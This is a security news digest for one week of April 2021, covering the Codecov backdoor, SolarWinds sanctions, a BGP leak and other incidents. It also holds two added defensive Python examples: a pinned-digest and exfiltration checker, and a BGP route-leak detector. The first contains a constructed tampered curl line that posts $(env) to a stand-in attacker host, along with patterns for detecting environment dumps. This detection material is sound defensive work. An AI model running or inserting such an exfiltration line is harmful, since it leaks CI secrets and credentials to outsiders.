Sat.Apr 17, 2021 - Fri.Apr 23, 2021

When cryptography attacks – how TLS helps malware hide in plain sight

Naked Security

No IT technology feels quite as much of a double-edged sword as encryption.

Privacy and security in the software designing

Security Affairs

The importance of carrying out a careful risk and impact assessment in order to safeguard the security of information and data privacy. To reduce as far as possible the vulnerabilities and programming errors that not only affect the quality of the product itself but can also be exploited to launch increasingly sophisticated and frequent computer attacks, it is necessary to guarantee the protection parameters of computer security in terms of integrity, confidentiality and auth

Explaining Threats, Threat Actors, Vulnerabilities, and Risk Using a Real-World Scenario

Daniel Miessler

Casey Ellis (of Bugcrowd fame) had a great post on Twitter today about security terminology. Casey also added that Acceptable Risk would be being willing to get punched in the face.

threat actor = someone who wants to punch you in the face
threat = the punch being thrown
vulnerability = your inability to defend against the punch
risk = the likelihood of getting punched in the face
— cje (@caseyjohnellis) April 19, 2021

Backdoor Found in Codecov Bash Uploader

Schneier on Security

Developers have discovered a backdoor in the Codecov bash uploader. It’s been there for four months. We don’t know who put it there. “The breach allowed the attackers to export information stored in its users’ continuous integration (CI) environments. This information was then sent to a third-party server outside of Codecov’s infrastructure,” the company warned.
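The practitioner's defence against a tampered build-time script is to refuse to run anything that does not match a digest pinned out of band, and to look for exactly the behaviour the notice describes: the script shipping the CI environment to a server the pipeline never talked to. The block below is an added example, not code from the page or from Codecov; the uploader scripts, the hosts codecov.example.com and collector.attacker.example, and the gate() helper are constructed for illustration.

```python
"""Pinned-digest and exfiltration checks for a CI helper script fetched at build time.

Added example, not code from the page or from Codecov. The scripts are
constructed stand-ins for a `curl | bash` style uploader; the tampered copy
adds one line that posts the CI environment to a host the pipeline never
expected, which is the behaviour the Codecov notice describes."""
import hashlib
import hmac
import re

# Constructed sample uploader (hypothetical host codecov.example.com).
GOOD_SCRIPT = b"""#!/usr/bin/env bash
set -eu
report=$(find . -name coverage.xml | head -n1)
curl -sS --data-binary @"$report" https://codecov.example.com/upload
"""

# Constructed tampered copy: the extra line exports $(env), CI secrets included,
# to a third-party server. The host is hypothetical.
TAMPERED_SCRIPT = GOOD_SCRIPT + (
    b'curl -s -d "$(git remote -v) $(env)" https://collector.attacker.example/upload\n'
)

# Digest the pipeline pinned when the script was last reviewed. In practice it is
# published by the vendor out of band and stored in the repo, never fetched
# alongside the script it is meant to check.
PINNED_SHA256 = hashlib.sha256(GOOD_SCRIPT).hexdigest()

# Hosts the uploader is allowed to talk to (assumed for this example).
ALLOWED_HOSTS = {"codecov.example.com"}

HOST_RE = re.compile(rb"https?://([A-Za-z0-9.-]+)")
NET_CLIENT_RE = re.compile(rb"\b(curl|wget)\b")
ENV_DUMP_RE = re.compile(rb"\$\(\s*(env|printenv)\b|\bprintenv\b|\benv\s*\|")


def verify_pinned(script: bytes, pinned_hex: str) -> bool:
    """True only if the script's SHA-256 equals the pinned digest.
    compare_digest gives a constant-time comparison."""
    actual = hashlib.sha256(script).hexdigest()
    return hmac.compare_digest(actual, pinned_hex)


def unexpected_hosts(script: bytes, allowed=frozenset(ALLOWED_HOSTS)) -> set:
    """Hosts referenced by URL in the script that are not on the allow-list."""
    found = {m.group(1).decode() for m in HOST_RE.finditer(script)}
    return found - set(allowed)


def env_exfil_lines(script: bytes) -> list:
    """1-based line numbers where a network client and an environment dump
    appear on the same line: the pattern of shipping CI secrets off-box."""
    hits = []
    for no, line in enumerate(script.splitlines(), start=1):
        if NET_CLIENT_RE.search(line) and ENV_DUMP_RE.search(line):
            hits.append(no)
    return hits


def gate(script: bytes, pinned_hex: str = PINNED_SHA256) -> dict:
    """Decision the CI job makes before executing the fetched script."""
    pinned_ok = verify_pinned(script, pinned_hex)
    hosts = unexpected_hosts(script)
    exfil = env_exfil_lines(script)
    return {
        "run": pinned_ok and not hosts and not exfil,
        "pinned_ok": pinned_ok,
        "unexpected_hosts": sorted(hosts),
        "env_exfil_lines": exfil,
    }


if __name__ == "__main__":
    for name, script in (("good", GOOD_SCRIPT), ("tampered", TAMPERED_SCRIPT)):
        print(name, gate(script))
```

Pinning only helps if the digest is stored and compared outside the fetched artifact itself; a checksum served next to a compromised script is no protection. The host and env-dump scans are cheap heuristics for triage, not a substitute for the pin.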

IDC Analyst Report: The Open Source Blind Spot Putting Businesses at Risk

In a recent study, IDC found that 64% of organizations said they were already using open source in software development with a further 25% planning to in the next year. Most organizations are unaware of just how much open-source code is used and underestimate their dependency on it. As enterprises grow the use of open-source software, they face a new challenge: understanding the scope of open-source software that's being used throughout the organization and the corresponding exposure.

Weekly Update 239

Troy Hunt

Geez I'm glad the Facebook stuff was the week before this one! With that (mostly) out of the way, we headed off to Thredbo for a couple of days of mountain biking, hitting trails I've only ever snowboarded down before (yes, we get snow in Australia). Back to normality (I think we can start calling it that now), Rob and I did our book editing session, the Facebook scraping incident (let's stop calling it a "data breach") continued to consume time and in a case of very fortuitous timing, they're c

Top 5 ways to protect against cryptocurrency scams

Tech Republic Security

As the use of cryptocurrency increases, so does the risk of being a target for scammers. Tom Merritt offers five tips for defending against cryptocurrency scams.

Biden Administration Imposes Sanctions on Russia for SolarWinds

Schneier on Security

On April 15, the Biden administration both formally attributed the SolarWinds espionage campaign to the Russian Foreign Intelligence Service (SVR), and imposed a series of sanctions designed to punish the country for the attack and deter future attacks. I will leave it to those with experience in foreign relations to convince me that the response is sufficient to deter future operations.

Carbanak and FIN7 Attack Techniques

Trend Micro

What happens in Carbanak and FIN7 attacks? Here are some techniques used by these financially motivated threat groups that target banks, retail stores, and other establishments.

Baseball and cybersecurity have more in common than you think

Tech Republic Security

A former pro baseball player and coach turned sports psychologist believes there is much cybersecurity pros can learn from sports mental conditioning. He wants to help them hit more home runs.

Major Cyber Attacks that took place so far in 2021

CyberSecurity Insiders

Microsoft Exchange Server Cyber Attack: threat actors infiltrated Microsoft Exchange email servers around the world through zero-day vulnerabilities and accessed data of many government agencies and private companies. Microsoft later stated that the attack was likely the work of a Chinese hacking group it named Hafnium.

Beware of Pixels & Trackers on U.S. Healthcare Websites

The healthcare industry has widely adopted web tracking tools, including pixels and trackers. Tracking tools on both authenticated and unauthenticated web pages can capture protected health information (PHI) such as IP addresses, medical record numbers, home and email addresses, appointment dates, or other information users enter on those pages, and can therefore violate the HIPAA Rules governing the use of online tracking technologies by HIPAA covered entities and business associates.

Details on the Unlocking of the San Bernardino Terrorist’s iPhone

Schneier on Security

The Washington Post has published a long story on the unlocking of the San Bernardino Terrorist’s iPhone 5C in 2016. We all thought it was an Israeli company called Cellebrite. It was actually an Australian company called Azimuth Security. Azimuth specialized in finding significant vulnerabilities. Dowd, a former IBM X-Force researcher whom one peer called “the Mozart of exploit design,” had found one in open-source code from Mozilla that Apple used to permit accessories to be

Navigating Cybersecurity Gaps in Uncertain Times

Security Boulevard

If cybersecurity leaders and teams think this year will be quieter and easier than 2020, they are mistaken. The remote work trend launched by COVID-19 is morphing into a new hybrid environment in which some employees work at home full time, others at corporate facilities, and many at either location depending on the day.

Business and operations leaders are building digital trust through partnerships

Tech Republic Security

Organizations are increasing investments in cybersecurity and their dependence on third parties—even in light of disruptions, according to PwC's Cyber Trust report.

How to keep your Android device immune to malicious vaccine themed apps

Hot for Security

The bad news: attackers are exploiting interest in COVID-19 vaccine apps to deploy malware to Android devices. Since the outbreak of the pandemic they have not missed any opportunity to spread malware via COVID-19-themed emails, apps, websites and social media, and Bitdefender researchers have now found multiple apps taking advantage of mobile users looking for information about the vaccines or seeking an appointment to get the jab.

Software Composition Analysis: The New Armor for Your Cybersecurity

Speaker: Blackberry, OSS Consultants, & Revenera

Software is complex, which makes threats to the software supply chain more real every day. 64% of organizations have been impacted by a software supply chain attack and 60% of data breaches are due to unpatched software vulnerabilities. In the U.S. alone, cyber losses totaled $10.3 billion in 2022. All of these stats beg the question, “Do you know what’s in your software?”

On North Korea’s Cyberattack Capabilities

Schneier on Security

Excellent New Yorker article on North Korea’s offensive cyber capabilities.

Linux bans University of Minnesota for committing malicious code

Bleeping Computer

Linux kernel project maintainers have banned the University of Minnesota (UMN) from contributing to the open-source Linux project after a group of UMN researchers were caught submitting a series of malicious code commits: patches that deliberately introduced security vulnerabilities into the official Linux kernel.

Parrot OS Security edition is a Linux desktop distribution geared for security admins

Tech Republic Security

Security professionals would be well-served with this Linux distribution that offers a wide range of penetration and vulnerability testing tools.

6 Cybersecurity Tips for Working from Home

Security Boulevard

Here at Tripwire, we, like many others, recently surpassed the one-year anniversary of working from home due to the COVID-19 pandemic. Since March of 2020, we have converted kitchens, spare bedrooms and garages into office spaces. Our pets and children have become our coworkers, and companies are reporting a sudden increase in shirt sales as […]

From Complexity to Clarity: Strategies for Effective Compliance and Security Measures

Speaker: Erika R. Bales, Esq.

When we talk about “compliance and security,” most companies want to ensure that steps are being taken to protect what they value most (people, data, real or personal property, intellectual property, digital assets, or any number of other things), and it’s more important than ever that safeguards are in place. Let’s step back and focus on the idea that no matter how complicated the compliance and security regime, it should be possible to distill it down to a checklist.

120 Compromised Ad Servers Target Millions of Internet Users

The Hacker News

An ongoing malvertising campaign tracked as "Tag Barnakle" has been behind the breach of more than 120 ad servers over the past year to sneakily inject code in an attempt to serve malicious advertisements that redirect users to rogue websites, thus exposing victims to scamware or malware.

Major BGP leak disrupts thousands of networks globally

Bleeping Computer

A large BGP routing leak that occurred last night disrupted connectivity for thousands of major networks and websites around the world. Although the leak originated in the autonomous system of Vodafone Idea (AS55410) in India, it affected U.S. companies, including Google, according to sources.
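Route leaks of this kind are detectable from the AS path alone once the business relationships between the ASes in it are known. The block below is an added example, not code from the page or from BleepingComputer: it applies the valley-free rule to a few constructed UPDATEs, using documentation ASNs and a relationship table made up for the example (an operator would load CAIDA AS-relationship data or their own policy instead).

```python
"""Valley-free check of BGP AS paths to flag route leaks.

Added example, not code from the page or BleepingComputer. It implements the
Gao-Rexford valley-free rule: a legitimate path climbs customer->provider
links, crosses at most one peer link, then only descends provider->customer.
A customer that re-announces a route learned from one provider to another
provider (the classic RFC 7908 leak) produces a second climb after a descent.
The relationship table and the announcements are constructed for this example
and use documentation ASNs (RFC 5398)."""

# (provider, customer) transit pairs and unordered peer pairs; constructed.
PROVIDER_OF = {
    (64496, 64501),  # 64496 sells transit to 64501, the origin
    (64496, 64502),  # 64502 is multi-homed to 64496 ...
    (64497, 64502),  # ... and to 64497
    (64497, 64503),
}
PEERS = {frozenset({64496, 64497}), frozenset({64497, 64498})}


def link_type(sender, receiver):
    """How `sender` announced to `receiver`: 'up' (customer to provider),
    'down' (provider to customer), 'peer', or None if the relationship is unknown."""
    if (receiver, sender) in PROVIDER_OF:
        return "up"
    if (sender, receiver) in PROVIDER_OF:
        return "down"
    if frozenset((sender, receiver)) in PEERS:
        return "peer"
    return None


def classify_path(as_path):
    """as_path as carried in the UPDATE: [nearest AS, ..., origin AS].
    Returns 'ok', 'leak' or 'unknown' (some hop has no relationship data)."""
    hops = list(reversed(as_path))  # propagation order: origin first
    descending = False  # set once the path has crossed a peer or down link
    for sender, receiver in zip(hops, hops[1:]):
        if sender == receiver:  # AS-path prepending, not a real hop
            continue
        kind = link_type(sender, receiver)
        if kind is None:
            return "unknown"
        if descending and kind != "down":
            # climbed again, or took a second peer link, after the descent began
            return "leak"
        if kind in ("down", "peer"):
            descending = True
    return "ok"


def find_leaks(announcements):
    """announcements: iterable of (prefix, as_path). Returns entries not judged 'ok'."""
    flagged = []
    for prefix, path in announcements:
        verdict = classify_path(path)
        if verdict != "ok":
            flagged.append((prefix, path, verdict))
    return flagged


# Constructed UPDATEs as seen by an observer attached to 64497 and 64498.
ANNOUNCEMENTS = [
    ("192.0.2.0/24", [64497, 64496, 64501]),            # origin -> provider -> peer: fine
    ("192.0.2.0/24", [64497, 64502, 64496, 64501]),     # 64502 leaks 64496's route to 64497
    ("198.51.100.0/24", [64498, 64497, 64497, 64503]),  # prepending, still valley-free
    ("203.0.113.0/24", [64499, 64501]),                 # no relationship data for 64499
]

if __name__ == "__main__":
    for prefix, path, verdict in find_leaks(ANNOUNCEMENTS):
        print(prefix, path, verdict)
```

The 'unknown' verdict is deliberate: a hop with no relationship data is neither proof of a leak nor a clean bill, and silently treating it as 'ok' is how detectors miss real leaks.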

The boom in collaboration software creates extra security risks

Tech Republic Security

While the software solutions have made it easier to work from home, they've also made it easier to launch malware.

Diversity in the Cybersecurity Workforce

Security Boulevard

Like most technology workforce segments, the cybersecurity diversity issue is a very acute problem: there simply isn’t nearly enough representation of diverse backgrounds in cybersecurity roles, from security operations center (SOC) analysts all the way up through enterprise-level CISOs and board members. Erkang Zheng, founder and CEO of JupiterOne, said the primary issue that comes.

Successful Change Management with Enterprise Risk Management

Speaker: William Hord, Vice President of ERM Services

A well-defined change management process is critical to minimizing the impact that change has on your organization. Leveraging the data that your ERM program already contains is an effective way to help create and manage the overall change management process within your organization. Your ERM program generally assesses and maintains detailed information related to strategy, operations, and the remediation plans needed to mitigate the impact on the organization.

WhatsApp in pink? Watch out for this fake update

We Live Security

The malware sends automated replies to messages on WhatsApp and other major chat apps.

Passwordstate password manager hacked in supply chain attack

Bleeping Computer

Click Studios, the company behind the Passwordstate password manager, notified customers that attackers compromised the app's update mechanism to deliver malware in a supply-chain attack after breaching its networks.

Apple supplier Quanta hit with $50 million ransomware attack from REvil

Tech Republic Security

Hackers claim to have infiltrated the networks of Quanta Computer Inc., which makes MacBooks and hardware for HP, Facebook and Google.

U.S. Takes Aim at Russia’s Cyber Ops Ecosystem

Security Boulevard

The Biden administration is taking the Russian cyber operations ecosystem to task with sanctions pointed at both established Russian companies as well as Russian-controlled entities created by the FSB, GRU and SVR for operational purposes. Coupled with the U.S. Treasury sanctions, a joint advisory from CISA, NSA and the FBI identified the SVR (Russian Foreign.

Cover Your SaaS: How to Overcome Security Challenges and Risks For Your Organization

Speaker: Ronald Eddings, Cybersecurity Expert and Podcaster

So, you’ve accomplished an organization-wide SaaS adoption. It started slow, and now just a few team members might be responsible for running Salesforce, Slack, and a few other applications that boost productivity, but it’s all finished. Or is it? For all the benefits offered by SaaS applications, it is still necessary to onboard providers as quickly as possible.

Apple AirDrop Flaws Could Let Hackers Grab Users’ Phone Numbers and Email Addresses

Hot for Security

Users of Apple products have long loved the ability to wirelessly share files with each other, using AirDrop to transmit files between their iPhones and MacBooks. But researchers at the Technical University of Darmstadt in Germany have discovered security weaknesses that could allow an attacker to obtain a victim’s phone number and even email address.

World Book Day: Cybersecurity’s Quietest Celebration

The State of Security

The last time you were in a library or a bookstore, you probably noticed how quiet it was. This doesn’t mean that people weren’t excited, or even celebrating; they were engaged in a different method of celebration, the kind that takes place between the covers of a good book. April 23rd marks the celebration of […]

After Virginia passes new privacy law, states race to catch up to CCPA and GDPR

Tech Republic Security

Using Washington State's proposed law as a guide, New York, Texas and many other states are inching their way toward a data privacy law.

Ransomware 2021 has evolved. Are you keeping up with network security?

Security Boulevard

As we head deeper into 2021, it’s beginning to feel like there’s a light at the end of the tunnel and we can all take a deep breath. 2020 was a tumultuous year, one marked by a global pandemic, natural disasters and civil unrest. Last year also saw a record number of cybercrime complaints, with the FBI […]

How Preparation and Strategy Can Be Used to Fight and Defeat Any Ransomware Attack

Speaker: Karl Camilleri, Cloud Services Product Manager at phoenixNAP

Did you know that 2021 was a record-breaking year for ransomware? The days of a “once in a while” attack against businesses and organizations are over. Cyberthreats have become a serious issue. With 495.1 million attacks, the threat marked a 148% increase compared to 2020 and was the most expensive year on record! As a result, data protection needs to be a concern for most banks, businesses, and information technology specialists.